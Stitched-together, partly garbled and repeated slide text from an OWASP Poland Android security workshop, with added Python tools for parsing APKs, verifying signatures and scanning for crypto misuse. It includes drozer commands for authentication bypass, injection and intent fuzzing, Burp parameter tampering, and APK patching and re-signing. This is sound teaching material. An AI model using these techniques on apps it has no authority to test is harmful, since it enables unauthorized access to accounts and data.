bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
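Once the APK is on the workstation (with ADB: `adb shell pm path <package>` prints `package:/data/app/<package>-1/base.apk`, then `adb pull` that path), the first thing to do is look inside it. The script below is an added example, not code from the workshop: an APK is a plain ZIP, so it inventories the entries an analyst checks first (AndroidManifest.xml, classes*.dex, the META-INF signature files, native libraries) and parses the DEX header, recomputing the Adler-32 checksum and SHA-1 signature the format carries. The sample APK and its header-only classes.dex are constructed in memory; a real classes.dex that has been patched by hand without fixing these two fields is rejected by the runtime's checksum check (smali and apktool recompute them for you).

```python
import hashlib
import io
import re
import struct
import zipfile
import zlib

DEX_HEADER_SIZE = 0x70
# magic[8], checksum u32, signature[20], then twenty little-endian u32 fields
DEX_HEADER_FMT = "<8sI20s" + "I" * 20
DEX_U32_FIELDS = (
    "file_size", "header_size", "endian_tag", "link_size", "link_off", "map_off",
    "string_ids_size", "string_ids_off", "type_ids_size", "type_ids_off",
    "proto_ids_size", "proto_ids_off", "field_ids_size", "field_ids_off",
    "method_ids_size", "method_ids_off", "class_defs_size", "class_defs_off",
    "data_size", "data_off",
)
ENDIAN_CONSTANT = 0x12345678


def parse_dex_header(data: bytes) -> dict:
    """Parse a DEX header and recompute its two integrity fields.

    checksum  = Adler-32 over everything after the checksum field (offset 12)
    signature = SHA-1 over everything after the signature field (offset 32)
    Both run up to file_size.
    """
    if len(data) < DEX_HEADER_SIZE:
        raise ValueError("too short to hold a DEX header")
    fields = struct.unpack(DEX_HEADER_FMT, data[:DEX_HEADER_SIZE])
    magic, checksum, signature = fields[0], fields[1], fields[2]
    if not (magic.startswith(b"dex\n") and magic.endswith(b"\x00")):
        raise ValueError("bad DEX magic: %r" % magic)
    u32 = dict(zip(DEX_U32_FIELDS, fields[3:]))
    body = data[:u32["file_size"]]
    return {
        "version": magic[4:7].decode("ascii"),
        "little_endian": u32["endian_tag"] == ENDIAN_CONSTANT,
        "checksum_ok": (zlib.adler32(body[12:]) & 0xFFFFFFFF) == checksum,
        "signature_ok": hashlib.sha1(body[32:]).digest() == signature,
        "signature": signature.hex(),
        **u32,
    }


def build_dex(body: bytes = b"\x00" * 16, version: bytes = b"035") -> bytes:
    """Constructed sample: a header-only DEX (no classes) whose checksum and
    signature are valid, so the verification above has something real to check."""
    u32 = dict.fromkeys(DEX_U32_FIELDS, 0)
    u32.update(file_size=DEX_HEADER_SIZE + len(body), header_size=DEX_HEADER_SIZE,
               endian_tag=ENDIAN_CONSTANT, data_size=len(body), data_off=DEX_HEADER_SIZE)
    header = struct.pack(DEX_HEADER_FMT, b"dex\n" + version + b"\x00", 0, b"\x00" * 20,
                         *[u32[f] for f in DEX_U32_FIELDS])
    raw = bytearray(header + body)
    raw[12:32] = hashlib.sha1(raw[32:]).digest()                        # signature first
    raw[8:12] = struct.pack("<I", zlib.adler32(raw[12:]) & 0xFFFFFFFF)  # checksum covers it
    return bytes(raw)


def build_apk(entries: dict) -> bytes:
    """Constructed sample APK: an APK is only a ZIP with well-known entry names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, content in entries.items():
            z.writestr(name, content)
    return buf.getvalue()


def inventory(apk_bytes: bytes) -> dict:
    """First look at a pulled APK: manifest, dex files (multidex adds classes2.dex, ...),
    v1 signature files, native libraries, and whether every dex header verifies."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = z.namelist()
        dex_names = sorted(n for n in names if re.fullmatch(r"classes\d*\.dex", n))
        sig_suffixes = (".MF", ".SF", ".RSA", ".DSA", ".EC")
        return {
            "manifest": "AndroidManifest.xml" in names,
            "dex": dex_names,
            "signature_files": sorted(n for n in names
                                      if n.startswith("META-INF/") and n.upper().endswith(sig_suffixes)),
            "native_libs": sorted(n for n in names if n.startswith("lib/") and n.endswith(".so")),
            "dex_headers": {n: parse_dex_header(z.read(n)) for n in dex_names},
        }


SAMPLE_DEX = build_dex()
SAMPLE_APK = build_apk({
    "AndroidManifest.xml": b"<binary AXML placeholder; apktool decodes the real one>",
    "classes.dex": SAMPLE_DEX,
    "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\r\n\r\n",
    "META-INF/CERT.SF": b"Signature-Version: 1.0\r\n\r\n",
    "META-INF/CERT.RSA": b"<PKCS#7 placeholder>",
    "lib/arm64-v8a/libnative.so": b"\x7fELF placeholder",
    "res/layout/main.xml": b"<binary AXML placeholder>",
})

if __name__ == "__main__":
    inv = inventory(SAMPLE_APK)
    for key in ("manifest", "dex", "signature_files", "native_libs"):
        print("%-16s %s" % (key, inv[key]))
    hdr = inv["dex_headers"]["classes.dex"]
    print("classes.dex: version %s, checksum_ok=%s, signature_ok=%s, class_defs=%d"
          % (hdr["version"], hdr["checksum_ok"], hdr["signature_ok"], hdr["class_defs_size"]))
```

Feed `inventory()` the bytes of a real base.apk and the same fields come back; a `signature_ok` of False on an APK taken straight from a device is a sign the dex was modified in transit or on disk, while on your own rebuilt APK it means the header was not fixed up after patching.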
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – assembly code (Smali)
• Why disassembling and not decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling – dex2jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows the use of any existing Java decompiler with the resulting JAR file
Decompiling – Java decompilers
• JD-GUI || Luyten
  – Closed-source Java decompiler
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
• Apktool
  – Open-source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
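Why the rebuilt APK has to be re-signed at all: the v1 (JAR) signature scheme stores a digest of every entry in META-INF/MANIFEST.MF, so the moment classes.dex is patched and repacked the recorded digests no longer match, and an apktool rebuild carries no META-INF at all until signapk or apksigner writes one. The check below is an added example, not code from the workshop; it re-computes the per-entry digests of the manifest layer only. It does not verify CERT.SF/CERT.RSA or the APK Signature Scheme v2 block, which needs a real verifier (`apksigner verify --verbose`). The three sample APKs are constructed in memory.

```python
import base64
import hashlib
import io
import zipfile

DIGEST_ALGOS = {"SHA1-Digest": hashlib.sha1, "SHA-256-Digest": hashlib.sha256}


def parse_manifest(mf_bytes: bytes) -> dict:
    """{entry name: (digest header, base64 digest)} from META-INF/MANIFEST.MF.
    Lines over 72 bytes are wrapped with a leading space (JAR spec), so
    continuation lines are joined before the attributes are split."""
    text = mf_bytes.decode("utf-8").replace("\r\n", "\n").replace("\n ", "")
    digests = {}
    for section in text.split("\n\n"):
        attrs = dict(line.split(": ", 1) for line in section.splitlines() if ": " in line)
        for header in DIGEST_ALGOS:
            if "Name" in attrs and header in attrs:
                digests[attrs["Name"]] = (header, attrs[header])
    return digests


def build_manifest(entries: dict, header: str = "SHA1-Digest") -> bytes:
    """Constructed stand-in for the MANIFEST.MF that signapk writes (signapk also
    writes CERT.SF and CERT.RSA, which are not modelled here)."""
    algo = DIGEST_ALGOS[header]
    lines = ["Manifest-Version: 1.0", "Created-By: example", ""]
    for name, content in entries.items():
        lines += ["Name: " + name,
                  header + ": " + base64.b64encode(algo(content).digest()).decode("ascii"), ""]
    return ("\r\n".join(lines) + "\r\n").encode("utf-8")


def verify_manifest_digests(apk_bytes: bytes) -> dict:
    """Compare every non-META-INF entry with its digest in MANIFEST.MF.
    mismatched: changed after signing (a patched classes.dex)
    unlisted:   added after signing
    missing:    listed in the manifest but no longer in the ZIP"""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = [n for n in z.namelist() if not n.startswith("META-INF/") and not n.endswith("/")]
        if "META-INF/MANIFEST.MF" not in z.namelist():
            return {"signed": False, "mismatched": [], "unlisted": names, "missing": []}
        listed = parse_manifest(z.read("META-INF/MANIFEST.MF"))
        mismatched = []
        for name in names:
            if name in listed:
                header, expected = listed[name]
                actual = base64.b64encode(DIGEST_ALGOS[header](z.read(name)).digest()).decode("ascii")
                if actual != expected:
                    mismatched.append(name)
        return {"signed": True, "mismatched": mismatched,
                "unlisted": [n for n in names if n not in listed],
                "missing": [n for n in listed if n not in names]}


def make_apk(entries: dict, manifest: bytes = None) -> bytes:
    """Constructed sample APK (ZIP) with an optional MANIFEST.MF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, content in entries.items():
            z.writestr(name, content)
        if manifest is not None:
            z.writestr("META-INF/MANIFEST.MF", manifest)
    return buf.getvalue()


# Constructed samples: the app as shipped, an apktool rebuild (no META-INF until it
# is signed), and a classes.dex swapped directly into the still-signed ZIP.
ORIGINAL = {"AndroidManifest.xml": b"<axml>", "classes.dex": b"dex\n035\x00 original code",
            "res/layout/main.xml": b"<axml>"}
PATCHED_DEX = b"dex\n035\x00 isPremium() now returns true"
SIGNED_APK = make_apk(ORIGINAL, build_manifest(ORIGINAL))
REBUILT_APK = make_apk(dict(ORIGINAL, **{"classes.dex": PATCHED_DEX}))
TAMPERED = dict(ORIGINAL, **{"classes.dex": PATCHED_DEX})
TAMPERED["assets/payload.bin"] = b"added after signing"
TAMPERED_APK = make_apk(TAMPERED, build_manifest(ORIGINAL))

if __name__ == "__main__":
    for label, apk in (("signed", SIGNED_APK), ("rebuilt", REBUILT_APK), ("tampered", TAMPERED_APK)):
        print("%-9s %s" % (label, verify_manifest_digests(apk)))
```

The same function is useful in the other direction during malware analysis: an APK whose manifest digests do not match its contents was repacked by someone who did not (or could not) re-sign it, which is a quick tell for a trojanised copy of a legitimate app.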
Demo Time
Demo: Decompiling with Luyten
Demo: Modifying Smali files
Demo
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using drozer:
  dz> run app.activity.start --component <package_name> <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed – they must be enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store the user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple-words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…)
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/MD5, SHA1, etc.)
Broken Cryptography – example
• An encrypted db is definitely a good idea…
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys, credentials or OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
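Both halves of M6 in one added example (not code from the workshop, nor from NQ Vault or any app mentioned here): `find_crypto_issues()` is the "how to find" step, a pattern scan over decompiled Java (dex2jar + JD-GUI/Luyten output) for hardcoded keys and passwords, weak or mis-configured algorithms and the other tells listed above, in the spirit of QARK's static checks; `derive_db_key()`, `new_key_record()` and `unlock()` are the mitigation "use password-based encryption": the database key is derived from the user's passphrase with PBKDF2 and a random salt whenever it is needed, so only the salt, the iteration count and a check value ever touch the device. The regex rules are assumptions about how decompiled code spells these mistakes, the Java snippet is constructed, and the encryption itself (AES-GCM from a vetted library; the standard library has no AES) is out of scope.

```python
import hashlib
import hmac
import os
import re

# (pattern, finding): assumptions about how decompiled Java (JD-GUI/Luyten output)
# spells the usual mistakes; extend for the code base under review.
CRYPTO_RULES = [
    (r'Cipher\.getInstance\("(?:DES|DESede|RC4|ARCFOUR|Blowfish)[^"]*"\)', "weak cipher"),
    (r'Cipher\.getInstance\("AES(?:/ECB[^"]*)?"\)', "AES in ECB mode"),   # bare "AES" defaults to ECB
    (r'MessageDigest\.getInstance\("(?:MD2|MD4|MD5|SHA-?1)"\)', "weak hash"),
    (r'new SecretKeySpec\(\s*(?:"[^"]+"\.getBytes\(|new byte\[\]\s*\{)', "hard-coded key"),
    (r'new IvParameterSpec\(\s*(?:"[^"]+"\.getBytes\(|new byte\[\]\s*\{)', "static IV"),
    (r'(?:openOrCreateDatabase|openDatabase|getWritableDatabase|getReadableDatabase)\(\s*"[^"]+"',
     "database password literal"),
    (r'(?i)(?:password|passwd|pwd|secret|api_?key|token)\w*\s*=\s*"[^"]+"', "credential literal"),
    (r'new (?:java\.util\.)?Random\(', "java.util.Random is not a CSPRNG"),
]


def find_crypto_issues(source: str):
    """Scan one decompiled source file; returns (line, finding, matched text) tuples."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for pattern, finding in CRYPTO_RULES:
            m = re.search(pattern, line)
            if m:
                hits.append((lineno, finding, m.group(0)))
    return hits


def scan_tree(root: str) -> dict:
    """Walk a JD-GUI/Luyten export and return {path: hits} for files with findings."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".java"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as f:
                    hits = find_crypto_issues(f.read())
                if hits:
                    report[path] = hits
    return report


# Mitigation side: derive the database key from the user's passphrase on demand.
PBKDF2_ITERATIONS = 200_000


def derive_db_key(passphrase: str, salt: bytes, iterations: int = PBKDF2_ITERATIONS) -> bytes:
    """32-byte key for the database cipher; computed when needed, never written to disk."""
    return hashlib.pbkdf2_hmac("sha256", passphrase.encode("utf-8"), salt, iterations, dklen=32)


def new_key_record(passphrase: str) -> dict:
    """The only things that may live on the device: salt, iteration count and a
    check value so a wrong passphrase is detected without storing the key.
    (The check value is as brute-forceable as the ciphertext itself, which is
    why the iteration count matters.)"""
    salt = os.urandom(16)
    key = derive_db_key(passphrase, salt)
    return {"salt": salt, "iterations": PBKDF2_ITERATIONS,
            "check": hmac.new(key, b"db-key-check", "sha256").digest()}


def unlock(passphrase: str, record: dict):
    """Re-derive the key; returns it only if the check value matches, else None."""
    key = derive_db_key(passphrase, record["salt"], record["iterations"])
    if hmac.compare_digest(hmac.new(key, b"db-key-check", "sha256").digest(), record["check"]):
        return key
    return None


# Constructed sample of what the decompiler hands back for a "vault" app.
SAMPLE_JAVA = """\
package com.example.vault;
public class DbHelper extends SQLiteOpenHelper {
    private static final String DB_PASSWORD = "Passw0rd!";
    SQLiteDatabase open() { return getWritableDatabase("Passw0rd!"); }
    byte[] encrypt(byte[] plain) throws Exception {
        Cipher c = Cipher.getInstance("AES/ECB/PKCS5Padding");
        c.init(Cipher.ENCRYPT_MODE, new SecretKeySpec("0123456789abcdef".getBytes(), "AES"));
        return c.doFinal(plain);
    }
    String hashPin(String pin) throws Exception {
        return toHex(MessageDigest.getInstance("MD5").digest(pin.getBytes()));
    }
}
"""

if __name__ == "__main__":
    for lineno, finding, text in find_crypto_issues(SAMPLE_JAVA):
        print("line %2d  %-26s %s" % (lineno, finding, text))
    record = new_key_record("correct horse battery staple")
    print("unlock ok:", unlock("correct horse battery staple", record) is not None,
          " wrong passphrase:", unlock("hunter2", record))
```

Run `scan_tree()` over the directory JD-GUI or Luyten exported and triage the hits by hand: a "credential literal" may be a harmless constant name, but an "AES in ECB mode" or a "hard-coded key" hit next to a database helper is exactly the NQ Vault situation described above.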
M7 - Client side injection
Client side injection – what it is
• Simple-words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application, via an intent / content provider
  – A shared file
  – A server response
  – A third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS / WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (inter-process communication) to any other component (e.g. another application, a system service, starting a new activity, etc.) via special objects called Intents:

  // implicit intent: resolved by action + data, any app with a matching filter may handle it
